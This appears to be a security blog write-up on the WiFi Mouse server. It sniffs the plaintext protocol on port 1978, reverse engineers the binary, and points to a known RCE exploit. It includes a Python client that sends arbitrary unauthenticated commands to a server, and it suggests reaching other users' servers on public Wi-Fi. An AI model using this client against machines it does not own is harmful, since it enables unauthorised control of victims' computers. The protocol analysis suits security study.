In this article, we will look at how WiFi Mouse (wifimouse) works. wifimouse lets you control your laptop/PC from your phone: you can browse the files on your system, play and pause music, and control just about everything from the phone. It is available for Windows, Mac, and Linux.

I came across an RCE exploit for it on ExploitDB, a Python script. There was a bug in `wifimouse 1.7.8.5` that lets an attacker execute commands on the victim's PC. I won't be able to recreate that vulnerable setup for you, since I couldn't find this version (1.7.8.5) anywhere; the official website only offers the current version. But I will try to explain how it works. This article involves some reverse engineering, so if you are not familiar with it, learn the basics first and come back later.

I have the wifimouse server installed on my second Windows laptop. To connect to it, I install the wifimouse app on my Android phone. Both devices must be on the same network (connected to the same Wi-Fi).

As you can see, I have connected to my Windows server as a client. Actions I take in the app are performed on my Windows laptop; the most basic example is moving the cursor. I can also type into an input field.


We can do many more things with it, but I want to show you the other side: what is happening on the wire between the two devices. Let's start Wireshark and capture packets. Remember that the IP of my Windows machine is `10.42.0.237`, the IP of my Android phone is `10.42.0.32`, and the port on which the wifimouse server listens is `1978`. Doesn't it sound like a year (just kidding)?

So we can use a Wireshark display filter on those two hosts and TCP port 1978 to see only the traffic we care about.

It turns out the packets are not encrypted at all. Look at the highlighted value.

`Data: 6d6f732020376d2038202d3331`

If you hex-decode this, you get the command being sent from the phone to the Windows machine:

`mos  7m 8 -31`

This looks like a mouse-movement command carrying cursor positions, and that is exactly what we are sending to Windows. There are more actions we can perform, and we can examine what is sent for each of them.

For example, I can start a command prompt.

The output of Wireshark:

This is really amazing, right? But dangerous as well, because you now have an exposed service on your home or public Wi-Fi network that can launch applications and access files on your system, and it does so over an unencrypted channel.

At this point, I wanted to know how it works internally, so I moved on to reversing the wifimouse binary. To be honest, I really hate reverse engineering on Windows, so I used the ELF binary instead, which I extracted from the DEB package.

```shell
mkdir temp/; cd temp
wget https://wifimouse.necta.us/apk/mouseserver-32.deb
dpkg-deb -R mouseserver-32.deb mouseserver
ls mouseserver
```

The package metadata and maintainer scripts that dpkg uses when installing the package live in `mouseserver/DEBIAN/*`:

```shell
cat mouseserver/DEBIAN/*
```

And the binary itself is at `mouseserver/usr/sbin/mouseserver`:

```shell
02:56:46 root@kali-lucky wifimouse → file mouseserver/usr/sbin/mouseserver
mouseserver/usr/sbin/mouseserver: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=904e7731618a5f24ab59a0d579b04b0a62816bfa, stripped
ls -la mouseserver/usr/sbin/mouseserver
```

As we can see, we have a 32-bit stripped binary, which means there will be no function names to help us. I am going to use the NSA tool `Ghidra` here; you can use any other tool you like. I can search for the `main` function if it is visible, and even though the binary is stripped, Ghidra still shows a `main` function. Stripping removes the symbol table, but the program's entry point still passes the address of `main` to `__libc_start_main`, so it can be recovered by following `_start`.

main function decompiled:

Look at the code yourself:

https://gist.github.com/luckythandel/3a5c951b83745ee1cc9ecac3feb37819

It creates a socket on port 0x7BA (1978), then binds to and listens on that port.

Thread one:

```c
iVar3 = pthread_create(&local_7c,(pthread_attr_t *)0x0,GTKStartup,(void *)0x0);
```

This sounds like it creates the GUI menu for the wifimouse server, the one we can reach from the taskbar.

Then there are two UDP socket threads, which might be used while transferring a file (that is my guess):

```c
iVar3 = pthread_create(&local_70,(pthread_attr_t *)0x0,udpsender,(void *)0x0);
iVar3 = pthread_create(&local_70,(pthread_attr_t *)0x0,udpserver,(void *)0x0);
```

And finally, there is `MobileMouseSession`, which looks like the session handler; it also logs every user-requested command to the display.

https://gist.github.com/luckythandel/e465b0c582defc975655150b13903db3

There is a function in the `MobileMouseSession` thread named `process`, taking one argument (a string). It is the function that handles all the commands (requests) from the user; for example, the mouse cursor we control through the phone is moved from here. It is very long, but most of the code just handles keyboard and mouse events, which you can ignore.

https://gist.github.com/luckythandel/266f0f1c90e10658924b6e78a16cb3cf

But I noticed one thing: in the Linux version a few commands are missing, for example `fileexplorer`.

You can write your own socket script in Python or any other language, or simply connect to port 1978 using netcat. Isn't that obvious and interesting at the same time? Look at the following image.

Actually, I had to switch back to the Windows wifimouse server, because it has most of the commands the Linux binary lacks. But you can see that I can successfully connect to the wifimouse server. Now think of a scenario where you are on public Wi-Fi and someone is using this application or a similar one. As an attacker, you can take advantage of this: since the port is reachable on the wireless interface, you will be able to connect to it and execute commands on the user's server.
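The hex payload from the capture earlier and the netcat connection described here can be reproduced with a few lines of Python. The following is an added example, not code from this article or from the wifimouse project: it decodes the `Data` field shown in the Wireshark capture, splits it into tokens, and opens a raw TCP connection to a server to write a plaintext command. The payload is the one captured above; the `send_command` helper, its name, and the assumption that the server accepts a bare ASCII string on the connection are mine (the capture shows an ASCII string, but how the server frames messages is not spelled out in the article).

```python
"""Added example (not from the article or wifimouse): decode a captured
WiFi Mouse payload and send a plaintext command to a server on port 1978."""
import socket
import sys
from typing import List

# Hex 'Data' field copied from the Wireshark capture in the article:
# one TCP payload sent from the phone to the server.
CAPTURED_HEX = "6d6f732020376d2038202d3331"

# Port the server listens on; 0x7BA in the decompiled main().
WIFIMOUSE_PORT = 0x7BA  # == 1978


def decode_payload(hex_data: str) -> str:
    """Turn Wireshark's hex 'Data' field back into the plaintext command."""
    return bytes.fromhex(hex_data).decode("ascii")


def encode_payload(command: str) -> str:
    """Inverse of decode_payload: the hex a phone (or an attacker) would send."""
    return command.encode("ascii").hex()


def tokenize(command: str) -> List[str]:
    """Split a command on whitespace.

    The first token is the verb ("mos" in the capture). The article only says
    the remaining tokens look like cursor positions, so they are returned as
    raw strings rather than interpreted.
    """
    return command.split()


def send_command(host: str, command: str,
                 port: int = WIFIMOUSE_PORT, timeout: float = 3.0) -> int:
    """Open a raw TCP connection and write one plaintext command.

    Assumption (mine, not from the article): the server reads the bare ASCII
    string off the socket exactly as the phone sends it. There is no
    handshake, authentication or encryption in the captured exchange, which
    is why a netcat session, or this function, is enough to drive the server.
    Returns the number of bytes written.
    """
    payload = command.encode("ascii")
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
    return len(payload)


if __name__ == "__main__":
    text = decode_payload(CAPTURED_HEX)
    print(f"captured payload: {text!r} -> tokens {tokenize(text)}")
    # Usage: python wifimouse_client.py <server-ip> "<command>"
    # e.g. replaying the captured mouse move against a server you own.
    if len(sys.argv) >= 3:
        sent = send_command(sys.argv[1], sys.argv[2])
        print(f"sent {sent} bytes to {sys.argv[1]}:{WIFIMOUSE_PORT}")
```

Replaying the captured bytes against a server you own is a concrete check of the point above: if the cursor moves, anyone who can reach port 1978 on the network can issue the same commands without any credentials.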

The exploit I mentioned previously works the same way; in that case the `openfile` command (Windows) is abused. You can read the exploit on ExploitDB. Unfortunately, I am not able to demonstrate it.
